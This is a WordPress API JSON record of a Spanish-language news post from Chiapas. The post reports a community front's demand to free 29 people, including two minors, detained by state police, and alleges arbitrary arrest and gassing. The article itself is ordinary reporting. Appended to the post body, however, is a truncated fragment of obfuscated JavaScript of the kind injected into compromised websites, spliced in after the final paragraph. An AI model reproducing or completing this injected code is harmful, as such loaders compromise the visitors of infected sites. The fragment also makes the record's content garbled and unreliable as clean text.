{"id":4590,"date":"2022-08-22T03:19:54","date_gmt":"2022-08-22T03:19:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4590"},"modified":"2022-08-22T03:19:55","modified_gmt":"2022-08-22T03:19:55","slug":"exigen-liberacion-de-detenidos-por-toma-de-caseta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4590","title":{"rendered":"Exigen liberaci\u00f3n de detenidos por toma de caseta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"664\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-1.07.57-PM-1024x664.jpeg\" alt=\"\" class=\"wp-image-4591\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-1.07.57-PM-1024x664.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-1.07.57-PM-300x195.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-1.07.57-PM-768x498.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-1.07.57-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- \u201cExigimos la inmediata liberaci\u00f3n de los 29 detenidos arbitrariamente el d\u00eda de ayer en la Ciudad de Tuxtla Guti\u00e9rrez y que fueron aprehendidos de manera violenta por la polic\u00eda estatal de Chiapas, quienes en otros momentos se les ha requerido en Oxchuc por el grupo criminal de los &#8220;Maria Tulukes y no hab\u00edan hecho absolutamente nada\u201d. Lo anterior lo demandaron en un comunicado, integrantes del Frente Comunitario por la Defensa de la Libre Determinaci\u00f3n de Oxchuc, dirigido al gobierno de Chiapas, a la Comisi\u00f3n Estatal y Nacional de los Derechos Humanos (CNDH-CEDH) donde se\u00f1alan que la Fiscal\u00eda General de Chiapas realiz\u00f3 una publicaci\u00f3n en su cuenta oficial de Facebook, donde se\u00f1ala que hay 27 detenidos mayores de edad y 2 menores de edad. \u201cSeg\u00fan esta instituci\u00f3n por atentados a la paz y la integridad corporal y patrimonial de la colectividad y el estado. Desde el Frente Comunitario sabemos que este no es un hecho que est\u00e9 tipificado y adem\u00e1s queremos ver de qu\u00e9 manera van a querer vincular a nuestros compa\u00f1eros detenidos el d\u00eda de ayer (viernes) por exigir el cumplimiento de una sentencia del Tribunal Electoral de Chiapas, en la que la misma secretar\u00eda de Seguridad de Chiapas est\u00e1 vinculada\u201d, suscriben. En la reconstrucci\u00f3n de hechos la Fiscal\u00eda asegura que no se menciona que en la detenci\u00f3n fueron gaseados, incluyendo los dos menores de edad, situaci\u00f3n que puede corroborarse con la informaci\u00f3n que muchos medios de comunicaci\u00f3n  difundieron en redes sociales. \u201cDesde ahora podemos constatar que efectivamente la detenci\u00f3n fue bajo la ilegalidad y la agresi\u00f3n f\u00edsica de todas las personas. Por lo tanto, este hecho fue una detenci\u00f3n arbitraria en la que hicieron uso de la fuerza a trav\u00e9s de los artefactos durante este proceso ya que todos hab\u00edan sido vulnerados\u201d, apuntan. Dejan ver que esta situaci\u00f3n se da en un contexto pol\u00edtico, donde las instituciones han violentado los derechos colectivos y ahora los derechos humanos, que tiene como eje central la exigencia del cumplimiento de una sentencia que el mismo Tribunal Electoral de Chiapas emiti\u00f3, sin embargo, ning\u00fan actor o actora pol\u00edtico de Chiapas \u201cha sido encarcelado por este hecho y mucho menos por los asesinatos que ha habido en Oxchuc\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- \u201cExigimos la inmediata liberaci\u00f3n de los 29 detenidos arbitrariamente el d\u00eda de ayer en la Ciudad de Tuxtla Guti\u00e9rrez y que fueron aprehendidos de manera violenta por la polic\u00eda estatal de Chiapas, quienes en otros momentos se les ha requerido en Oxchuc por el grupo criminal de los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4591,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4590","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4590","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4590"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4590\/revisions"}],"predecessor-version":[{"id":4592,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4590\/revisions\/4592"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4591"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4590"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4590"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4590"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}